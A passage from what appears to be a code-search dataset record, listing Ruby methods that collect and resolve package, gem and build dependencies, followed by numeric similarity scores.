end\n end\n\n # Filter out optional packages, e.g. llvm and clang for all platforms where not explicitly available\n deps_osdeps_packages = deps_osdeps_packages.select do |name|\n result = true\n Packaging::Config.packages_optional.each do |pkg_name|\n regex = Regexp.new(pkg_name)\n if regex.match(name)\n result = target_platform.contains(name)\n end\n end\n result\n end\n\n # Filter out excluded packages, e.g. libqwt5-qt4-dev\n deps_osdeps_packages = deps_osdeps_packages.select do |name|\n result = true\n Packaging::Config.packages_excluded.each do |pkg_name|\n regex = Regexp.new(pkg_name)\n if regex.match(name)\n Packager.info \"#{pkginfo.name} excluding osdeps #{pkg_name} as dependency\"\n result = false\n end\n end\n result\n end\n\n # Filter ruby versions out -- we assume chroot has installed all\n # ruby versions\n #\n # This is a workaround, since the information about required packages\n # comes from the build server platform and might not correspond\n # with the target platform\n #\n # Right approach: bootstrap within chroot and generate source packages\n # in the chroot\n #deps_osdeps_packages = deps[:osdeps].select do |name|\n deps_osdeps_packages = deps_osdeps_packages.select do |name|\n name !~ /^ruby[0-9][0-9.]*/\n end\n\n # Prefer package of the OS for gems if they are available there\n #deps_nonnative_packages = deps[:nonnative].map do |name, version|\n non_native_dependencies = non_native_dependencies.map do |name, version|\n dep_name,is_osdep = native_dependency_name(name)\n # if with_rock_release_prefix is given all packages 'have to be'\n # os dependencies, otherwise it triggers further resolution of nonnative packages\n # which cannot exist (in resolve_all)\n if is_osdep || with_rock_release_prefix\n deps_osdeps_packages << dep_name\n nil\n else\n name\n end\n end.compact\n end\n\n deps_rock_packages = deps_rock_pkginfos.map do |pkginfo|\n debian_name = @packager.debian_name(pkginfo, with_rock_release_prefix)\n this_rock_release.packageReleaseName(debian_name)\n end.sort\n\n Packager.info \"'#{pkginfo.name}' with (available) rock package dependencies: '#{deps_rock_packages}'\"\n Packager.info \"'#{pkginfo.name}' with (available) osdeps dependencies: '#{deps_osdeps_packages}'\"\n\n # Return rock packages, osdeps and non native deps (here gems)\n {:rock => 
deps_rock_packages, :osdeps => deps_osdeps_packages, :nonnative => non_native_dependencies }\n end",
"def dependency_versions(args = {}, &bl)\n versions = args[:versions] || {}\n check_deps = args[:dev] ? dev_deps : deps\n\n check_deps.each do |dep|\n unless versions.key?(dep.name)\n begin\n gem = Polisher::Gem.retrieve(dep.name)\n versions.merge! gem.versions(args, &bl)\n rescue\n unknown = Polisher::VersionChecker.unknown_version(:all, dep.name, &bl)\n versions.merge! dep.name => unknown\n end\n end\n\n args[:versions] = versions\n end\n\n versions\n end",
"def dependencies\n @dependencies ||= {}\n end",
"def extract_dependencies\n FileUtils.cd(working_dir) do\n cmd = [\"require 'yaml';\"]\n cmd << \"dependencies = Merb::BootLoader::Dependencies.dependencies\"\n cmd << \"entries = dependencies.map { |d| d.to_s }\"\n cmd << \"puts YAML.dump(entries)\"\n output = `merb -r \"#{cmd.join(\"\\n\")}\"`\n if index = (lines = output.split(/\\n/)).index('--- ')\n yaml = lines.slice(index, lines.length - 1).join(\"\\n\")\n return parse_dependencies_yaml(yaml)\n end\n end\n return []\n end",
"def dependencies\n @dependencies.collect { |name, dependency| dependency }\n end",
"def dependencies(recurse: true)\n return @dependencies if @dependencies\n depends = yaml['depends']\n if depends.nil? || depends.empty?\n @dependencies = nil\n else\n @dependencies = depends.map do |name, dependency|\n reader = StackFileLoader.for(dependency['stack'], self)\n deps = { 'name' => name, 'stack' => reader.source, 'variables' => dependency.fetch('variables', Hash.new) }\n if recurse\n child_deps = reader.dependencies\n deps['depends'] = child_deps unless child_deps.nil?\n end\n deps\n end\n end\n end",
"def dependencies( names )\n names.each do |name|\n if calculation = fetch( name, nil )\n calculation.dependencies.each do |dependency|\n names << dependency unless names.include?( dependency )\n end\n end\n end\n end",
"def dependencies\n self.config.depends || []\n end",
"def dependent_specs\n runtime_dependencies.map {|dep| dep.to_specs }.flatten\n end",
"def declared_dependencies(ast)\n raise_unless_xpath!(ast)\n deps = ast.xpath(%q{//command[ident/@value='depends']/\n descendant::args_add/descendant::tstring_content[1]})\n # handle quoted word arrays\n var_ref = ast.xpath(%q{//command[ident/@value='depends']/\n descendant::var_ref/ident})\n unless var_ref.empty?\n deps += ast.xpath(%Q{//block_var/params/ident#{var_ref.first['value']}/\n ancestor::method_add_block/call/descendant::tstring_content})\n end\n deps.map{|dep| dep['value']}\n end",
"def dependencies\n manager.dependencies\n end",
"def find_dependencies(deps=nil, verbose=false)\n \n deps ||= all_dependencies\n\n search_list = Array(deps)\n found = []\n ret = []\n \n # if we discover a new local package via indirect dependencies then\n # it's dependencies will be fetchable one time.\n fetchable = Set.new\n \n until search_list.empty?\n name, version = search_list.shift\n\n if dup = found.find{|p| p.name == name}\n # already found, check for conflicts\n next if satisfied_by?(version, dup.version)\n raise PackageConflictError.new(name, dup.version, version)\n end\n\n pkg = locate_package(name, version, verbose)\n if pkg.nil? && fetchable.include?(name)\n fetchable.reject! { |x| x == name }\n core_fetch_dependency(name, version, :runtime, true) \n pkg = locate_package name, version, verbose\n end\n \n raise PackageNotFoundError.new(name, version) unless pkg\n\n found << pkg\n\n # Look up dependencies of dependencies\n new_deps = Array(pkg.dependencies) + Array(pkg.dependencies_build)\n if has_local_package? pkg.name\n new_deps += Array(pkg.dependencies_development)\n new_deps.each { |dep| fetchable.add dep.first }\n end\n \n search_list += new_deps\n\n ret << pkg\n end\n\n ret\n end",
"def dependencies; end",
"def dependencies; end",
"def dependencies; end",
"def gem_dependencies(list, gem_dependencies, options = {})\n gem_dependencies.each do |gd|\n if options['excludes'] && options['excludes'].to_s.split(',').include?(gd.name)\n next\n end\n\n gs = gd.matching_specs.first\n if gs\n unless list[gs.name]\n list[gs.name] = gs\n unless gs.dependencies.empty?\n list = gem_dependencies(list, gs.dependencies, options)\n end\n end\n else\n unless list[gd.name]\n list[gd.name] = Gem::Specification.new(\n gd.name,\n gd.requirements_list.last.scan(/[\\d\\.\\w]+/).first\n )\n rm_dep = remote_dependencies(gd.name, gd.requirements_list.last)\n unless rm_dep.empty?\n list = gem_dependencies(list, rm_dep, options)\n end\n end\n end\n end\n\n list\n end",
"def gem_requirements_to_array(*deps)\n deps.map do |dep|\n dep.requirement.requirements.map do |op, version|\n \"#{op} #{version}\"\n end.sort\n end\n end",
"def getDeps csproj\r\n deps = []\r\n csproj.search(\"reference\") do |ref|\r\n deps << ref.get_attribute(\"include\").match(/^([^,]+),*/)[1]\r\n end\r\n return deps\r\nend",
"def check_dependencies\n ok = true\n\n @config.each_pair { |type, values|\n next if !values.instance_of?(Array)\n _shortclass, cfg_name, _cfg_plural, _classname = MU::Cloud.getResourceNames(type, false)\n next if !cfg_name\n values.each { |resource|\n next if !resource.kind_of?(Hash) or resource[\"dependencies\"].nil?\n addme = []\n deleteme = []\n\n resource[\"dependencies\"].each { |dependency|\n dependency[\"their_phase\"] ||= dependency[\"phase\"]\n dependency.delete(\"phase\")\n dependency[\"my_phase\"] ||= dependency[\"no_create_wait\"] ? \"groom\" : \"create\"\n dependency.delete(\"no_create_wait\")\n # make sure the thing we depend on really exists\n sibling = haveLitterMate?(dependency['name'], dependency['type'])\n if !sibling\n MU.log \"Missing dependency: #{type}{#{resource['name']}} needs #{cfg_name}{#{dependency['name']}}\", MU::ERR\n ok = false\n next\n end\n\n # Fudge dependency declarations to quash virtual_names that we know\n # are extraneous. Note that wee can't do all virtual names here; we\n # have no way to guess which of a collection of resources is the\n # real correct one.\n if sibling['virtual_name'] == dependency['name']\n real_resources = []\n found_exact = false\n resource[\"dependencies\"].each { |dep_again|\n if dep_again['type'] == dependency['type'] and sibling['name'] == dep_again['name']\n dependency['name'] = sibling['name']\n found_exact = true\n break\n end\n }\n if !found_exact\n all_siblings = haveLitterMate?(dependency['name'], dependency['type'], has_multiple: true)\n if all_siblings.size > 0\n all_siblings.each { |s|\n newguy = dependency.clone\n newguy['name'] = s['name']\n addme << newguy\n }\n deleteme << dependency\n MU.log \"Expanding dependency which maps to virtual resources to all matching real resources\", MU::NOTICE, details: { sibling['virtual_name'] => addme }\n next\n end\n end\n end\n\n if dependency['their_phase'] == \"groom\"\n sibling['dependencies'].each { |sib_dep|\n next if sib_dep['type'] != cfg_name or sib_dep['their_phase'] != \"groom\"\n cousin = haveLitterMate?(sib_dep['name'], sib_dep['type'])\n if cousin and cousin['name'] == resource['name']\n MU.log \"Circular dependency between #{type} #{resource['name']} <=> #{dependency['type']} #{dependency['name']}\", MU::ERR, details: [ resource['name'] => dependency, sibling['name'] => sib_dep ]\n ok = false\n end\n }\n end\n\n # Check for a circular relationship that will lead to a deadlock\n # when creating resource. This only goes one layer deep, and does\n # not consider groom-phase deadlocks.\n if dependency['their_phase'] == \"groom\" or\n dependency['my_phase'] == \"groom\" or (\n !MU::Cloud.resourceClass(sibling['cloud'], type).deps_wait_on_my_creation and\n !MU::Cloud.resourceClass(resource['cloud'], type).waits_on_parent_completion\n )\n next\n end\n\n if sibling['dependencies']\n sibling['dependencies'].each { |sib_dep|\n next if sib_dep['type'] != cfg_name or sib_dep['my_phase'] == \"groom\"\n cousin = haveLitterMate?(sib_dep['name'], sib_dep['type'])\n if cousin and cousin['name'] == resource['name']\n MU.log \"Circular dependency between #{type} #{resource['name']} <=> #{dependency['type']} #{dependency['name']}\", MU::ERR, details: [ resource['name'] => dependency, sibling['name'] => sib_dep ]\n ok = false\n end\n }\n end\n }\n resource[\"dependencies\"].reject! { |dep| deleteme.include?(dep) }\n resource[\"dependencies\"].concat(addme)\n resource[\"dependencies\"].uniq!\n\n }\n }\n\n ok\n end",
"def get_dependencies\n @dependencies\n end",
"def collect_dependencies(dependency, known_dependencies: {})\n dep_spec = dependency.matching_specs\n return known_dependencies if dep_spec.empty?\n\n dep_spec = dep_spec.first\n known_dependencies[dep_spec.name] = dep_spec.version\n dep_spec.dependencies.each do |dep|\n unless known_dependencies.has_key?(dep.name)\n collect_dependencies(dep, known_dependencies: known_dependencies)\n end\n end\n known_dependencies\n end",
"def gem_dependencies(rubygem)\n (latest = latest_gemspec(rubygem)) ?\n latest.dependencies.select {|e| e.type == :runtime }.map {|e| e.name} : []\n end",
"def find_dependencies\n\t\tunless GEMDEPS_FILE.readable?\n\t\t\tself.prompt.warn \"Deps file (%s) is missing or unreadable, assuming no dependencies.\" %\n\t\t\t\t[ GEMDEPS_FILE ]\n\t\t\treturn []\n\t\tend\n\n\t\tfinder = Rake::DevEiate::GemDepFinder.new( GEMDEPS_FILE )\n\t\tfinder.load\n\t\treturn finder.dependencies\n\tend",
"def dependencies\n @dependencies\n end",
"def load_dependencies\n result = zh_client.dependencies(repo_name)\n\n result[\"dependencies\"].each do |hash|\n blocking = add_or_find(hash[\"blocking\"])\n blocked = add_or_find(hash[\"blocked\"])\n\n add_edge(blocked, blocking)\n end\n end",
"def dependencies\n EMPTY_SET\n end",
"def get_dependencies_from_metadata(metadata)\n checker = DependencyChecker::MetadataChecker.new(metadata, @forge, @updated_module, @updated_module_version)\n checker.check_dependencies\n end",
"def declared_dependencies(ast)\n deps = ast.xpath(\"//command[ident/@value='depends']/descendant::args_add/descendant::tstring_content\")\n # handle quoted word arrays\n var_ref = ast.xpath(\"//command[ident/@value='depends']/descendant::var_ref/ident\")\n deps += ast.xpath(%Q{//block_var/params/ident#{var_ref.first['value']}/ancestor::method_add_block/\n call/descendant::tstring_content}) unless var_ref.empty?\n deps.map{|dep| dep['value']}\n end",
"def declared_dependencies(ast)\n deps = ast.xpath(\"//command[ident/@value='depends']/descendant::args_add/descendant::tstring_content\")\n # handle quoted word arrays\n var_ref = ast.xpath(\"//command[ident/@value='depends']/descendant::var_ref/ident\")\n deps += ast.xpath(%Q{//block_var/params/ident#{var_ref.first['value']}/ancestor::method_add_block/\n call/descendant::tstring_content}) unless var_ref.empty?\n deps.map{|dep| dep['value']}\n end",
"def manifest_dependencies()\n as_bundle = Bundle.fromProject(self)\n as_bundle.nil? ? [] : as_bundle.bundles.collect{|b| b.resolve}.compact + as_bundle.imports.collect {|i| i.resolve}.flatten\n end",
"def dependency_links\n if @dependencies.nil?\n # Build the mapping: feature identifier => feature\n features_by_id = id2features\n\n # Resolve the dependency tags\n resolve_dependencies(features_by_id)\n end\n\n return @dependencies\n end",
"def package_depends_on\n depends_on\n end",
"def development_dependencies\n Gem::Specification.load(gemspec_path.to_s).development_dependencies\n end",
"def buildDependencies()\n clearDependencies()\n\n # first we add the constructed dependencies as we simply cleared *all* deps before\n addDependencyUnique(@compileFileDep) if not @fileIsGenerated\n addDependencyUnique(@compileTargetDep)\n addDependencyUnique(@configTaskDep)\n addDependencyUnique(@generatorTaskDep) if @fileIsGenerated\n\n return if not @dependencyLines # only go on if we have compiler generated deps\n\n dependencyFiles = Array.new\n @dependencyLines.each do |depLine|\n depLine.strip! # remove white space and newlines\n # remove backslash on each line, if present (GCC output is guaranteed to produce only a single backslash at line end)\n if depLine.include?('\\\\') then\n depLine.chop!\n end\n if depLine.include?(':') # the \"xyz.o\"-target specified by the compiler in the \"Makefile\"-rule needs to be skipped\n splitArr = depLine.split(\": \")\n dependencyFiles.concat(splitArr[1].split(\" \")) if splitArr[1]\n else\n dependencyFiles.concat(depLine.split(\" \"))\n end\n end\n dependencyFiles.each do |depFile|\n depFile.strip!\n next if depFile.empty?\n depFile = Makr.cleanPathName(depFile)\n next if (depFile == @fileName) # go on if dependency on source file encountered\n if @build.hasTask?(depFile) then\n task = @build.getTask(depFile)\n if not @dependencies.include?(task)\n addDependencyUnique(task)\n end\n elsif (task = @build.getTaskForTarget(depFile)) then\n if not @dependencies.include?(task)\n addDependencyUnique(task)\n end\n else\n task = FileTask.new(depFile)\n @build.addTask(depFile, task)\n addDependencyUnique(task)\n end\n task.update()\n end\n\n end",
"def deps(pkg) # FIXME: \"*** PACKAGE MAY NOT BE DELETED *** \"\n if pkg.status != :available\n components = `#{@cmd} -n #{pkg.name}`.split(\"Requires:\\n\")\n if components.size > 1\n return components[1].strip\n else\n return \"[No depends]\"\n end\n else\n if File.exist?(File.expand_path(\"~/Library/Application Support/Guigna/pkgsrc/INDEX\"))\n # TODO: parse INDEX\n end\n \"[Not available]\"\n end\n end",
"def collect(project)\n info \"** Collecting dependencies for #{project}\"\n @bundles = []\n @projects = []\n dependencies = project.manifest_dependencies().each {|dep| ; _collect(dep)}\n @projects.delete project # Remove our own reference if it was added.\n info \"** Done collecting dependencies for #{project}\"\n return dependencies\n end",
"def dependents_for(job)\n if !@dependencies[job] or @dependencies[job].empty?\n []\n else\n recursive_dependencies = @dependencies[job].map{ |klass| dependents_for(klass) }\n (@dependencies[job] + recursive_dependencies).flatten.uniq\n end\n end",
"def dependencies(&block)\n deps = ::OSGi::Dependencies.new(project)\n deps.read\n deps.dependencies + deps.projects\n end",
"def build_requirements_for_gem(gem_name)\n @metadata[:build_requires].nil? ? [] :\n @metadata[:build_requires].select { |r| r.gem_name == gem_name }\n end",
"def arduino_library_dependencies\n return [] unless library_properties?\n return [] if library_properties.depends.nil?\n\n library_properties.depends\n end",
"def dependencies(source, done=[])\n d_path = source.ext(\"d\") # get the dependency file\n Rake::Task[d_path].invoke # ensure the dependency file exists\n d_file = IO.read(d_path) # read the dependencies from dependency file\n d_file = d_file.split(': ')[1].gsub(\"\\n\",'').gsub('\\\\ ','').gsub(/\\s+/,' ').split(' ') # get a list of dependencies\n d_list = [] # list of dependencies\n # only save dependencies which are in our source directories\n d_file.each do |d|\n SRC_DIRS.each do |dir|\n if File.dirname(d)==dir then\n d_list << d\n end\n end\n end\n # get the dependencies of these dependencies, if we don't know them already\n done << source.ext(\"o\")\n done.uniq!\n d_list.each do |d|\n d = d.ext(\"o\")\n next if done.include? d\n done += dependencies(d, done)\n end\n done.uniq!\n return done\nend",
"def dependencies\n if @options[:dependencies]\n deps = [] << @options[:dependencies]\n deps.flatten.collect { |item|\n item = File.join(item,'**/*') if File.directory?(item)\n Dir.glob item\n }.flatten.uniq.collect { |item|\n File.directory?(item) ? nil : item\n }.compact\n else\n false\n end\n end",
"def build_dependencies(manager)\n DependenciesResolver.resolve manager, dependencies\n end",
"def lookup_dependencies(cookbook, checked = {})\n Berkshelf.log.debug \" Looking up dependencies for #{cookbook}\"\n\n dependencies = []\n\n lockfile.graph.find(cookbook).dependencies.each do |name, _|\n next if checked[name]\n\n # break cyclic graphs\n checked[name] = true\n\n # this is your standard depth-first tree traversal with the deps first...\n dependencies += lookup_dependencies(name, checked)\n # ..then the node itself\n dependencies << name\n end\n dependencies\n end",
"def test_resolve_dependencies\n Dir.mktmpdir('testbase') do |testbase|\n tpkg = Tpkg.new(:base => testbase, :sources => @pkgfiles)\n\n result = tpkg.resolve_dependencies([{:name => 'a', :type => :tpkg}], {:tpkg => {}, :native => {}}, ['a'])\n assert(result.has_key?(:solution))\n solution = result[:solution]\n\n # We should end up with a-1.0, b-1.0 (the specific one, not the generic\n # one), c-1.2 and d-1.2\n assert_equal(4, solution.length)\n good = ['a-1.0-1.tpkg', \"b-1.0-1-#{Metadata.clean_for_filename(tpkg.os.os)}.tpkg\", 'c-1.2-1.tpkg', 'd-1.2-1.tpkg']\n solution.each { |pkg| assert(good.any? { |g| pkg[:source].include?(g) }) }\n end\n end"
] | [
"0.70117927",
"0.67955554",
"0.67798376",
"0.671425",
"0.6661538",
"0.66558045",
"0.6655384",
"0.6621452",
"0.65861356",
"0.6531026",
"0.65242946",
"0.6503561",
"0.6468593",
"0.64621544",
"0.6460762",
"0.6459045",
"0.644103",
"0.64374304",
"0.64142406",
"0.6410538",
"0.63725793",
"0.6372415",
"0.6372415",
"0.6372415",
"0.6372415",
"0.6371087",
"0.6370149",
"0.63613",
"0.63611984",
"0.6356083",
"0.6354119",
"0.6349787",
"0.6341846",
"0.6341846",
"0.6331737",
"0.63094985",
"0.6304299",
"0.62972516",
"0.62877166",
"0.6255847",
"0.6255627",
"0.6255627",
"0.6255627",
"0.62555325",
"0.6253245",
"0.6236902",
"0.62321335",
"0.62204665",
"0.6204151",
"0.6173763",
"0.61630666",
"0.61630666",
"0.6162272",
"0.6160676",
"0.61537874",
"0.61536777",
"0.615292",
"0.61465514",
"0.6142236",
"0.6141648",
"0.61412424",
"0.6116082",
"0.6113848",
"0.61101305",
"0.609359",
"0.60853684",
"0.6061166",
"0.60510755",
"0.60510755",
"0.60510755",
"0.60509723",
"0.6046806",
"0.6015593",
"0.6011562",
"0.6008388",
"0.60057867",
"0.60027635",
"0.6001601",
"0.5997925",
"0.5989927",
"0.59797347",
"0.59733415",
"0.5965673",
"0.5965673",
"0.5949238",
"0.5944477",
"0.5943743",
"0.59232813",
"0.59196424",
"0.5914683",
"0.59107924",
"0.59100187",
"0.59093547",
"0.5903218",
"0.5896263",
"0.58901393",
"0.58783484",
"0.58599097",
"0.58589417",
"0.5857957"
] | 0.7326735 | 0 |